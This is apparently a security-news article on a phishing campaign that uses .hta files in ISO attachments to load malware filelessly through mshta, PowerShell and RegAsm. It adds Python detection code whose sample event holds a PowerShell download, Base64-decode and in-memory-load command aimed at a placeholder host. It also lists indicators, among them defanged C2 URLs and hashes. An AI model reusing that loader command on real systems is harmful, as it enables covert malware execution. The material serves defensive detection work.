Recent reports suggest threat actors have used phishing emails to distribute fileless malware. The attachment consists of a .hta (HTML Application) file, which can be used for deploying other malware like AgentTesla, Remcos, and LimeRAT.
The payload is a Portable Executable (PE) that is executed without ever being written to the victim's disk. The phishing email's body is a bank transfer notice, and it carries an ISO image attachment containing a .hta script file. That file is run by mshta.exe (the Microsoft HTML Application host).
As per reports shared with Cyber Security News, when the victims execute this ISO file, the embedded .hta file gets executed, which creates a process tree that consists of mshta.exe, cmd.exe, powershell.exe, and RegAsm.exe processes in order.
The mshta.exe process launches a PowerShell command. Its arguments fetch Base64-encoded data from the server with DownloadString, decode it, and load the result with CurrentDomain.Load before calling a function inside it. No PE file is written to disk; the binary runs entirely in the memory of the PowerShell process.
The PowerShell script also runs a DLL decoded from a Base64 string. This DLL downloads the final binary from the C2 server and injects it into RegAsm.exe (the .NET Assembly Registration Tool). That final binary could be any malware, such as Remcos, AgentTesla, or LimeRAT.
A complete report has been published by AhnLab, which provides detailed information about the malware, PE file, DLL file, and others.
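As an added example (not code from the article or from AhnLab's report), the following Python flags the two detection points the chain above offers: the mshta.exe > cmd.exe > powershell.exe > RegAsm.exe ancestry, and a PowerShell command line combining DownloadString, Base64 decoding and CurrentDomain.Load. The Sysmon-style event records and their field names are constructed assumptions.

```python
import re

# Constructed process-creation events (assumed fields: pid, ppid, image, cmd).
EVENTS = [
    {"pid": 100, "ppid": 10, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "D:\notice.hta"'},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c powershell ..."},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c \"$d=(New-Object Net.WebClient)"
            ".DownloadString('https://example.invalid/hta.txt');"
            "[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String($d))\""},
    {"pid": 104, "ppid": 103, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmd": "RegAsm.exe"},
    # Benign PowerShell use that must not be flagged.
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -c Get-Process"},
]

# Lineage the article describes, nearest parent first when read from RegAsm upward.
CHAIN = ["regasm.exe", "powershell.exe", "cmd.exe", "mshta.exe"]
# In-memory loading indicators; two or more together is the signal, one alone is noisy.
INMEM_PATTERNS = [r"downloadstring", r"frombase64string", r"currentdomain\.load"]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def ancestors(events, pid):
    """Image basenames from the process itself up to the root, child first."""
    by_pid = {e["pid"]: e for e in events}
    lineage = []
    while pid in by_pid:
        lineage.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return lineage

def find_hta_chain(events):
    """PIDs whose immediate ancestry is RegAsm <- powershell <- cmd <- mshta."""
    return [e["pid"] for e in events if ancestors(events, e["pid"])[:4] == CHAIN]

def find_inmemory_loader(events):
    """(pid, matched patterns) for PowerShell command lines that download, decode and load in memory."""
    hits = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        matched = [p for p in INMEM_PATTERNS if re.search(p, e["cmd"].lower())]
        if len(matched) >= 2:
            hits.append((e["pid"], matched))
    return hits
```

Both checks run on endpoint process telemetry that records parent PID and full command line; the ancestry check keys on exact process names, so a chain that drops the cmd.exe hop would need its own variant.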
Behavior Detection
Connection/EDR.Behavior.M2650
Execution/MDP.Powershell.M10668
File Detection
Downloader/Script.Generic
Trojan/Win.Generic.R526355
URL & C2
hxxps[:][/][/]cdn[.]pixelbin[.]io[/]v2[/]red-wildflower-1b0af4[/]original[/]hta[.]txt
hxxp[:][/][/]195[.]178[.]120[.]24[/]investorbase64[.]txt
MD5
43e75fb2283765ebacf10135f598e98c (.hta)
540d3bc5982322843934504ad584f370 (.dll)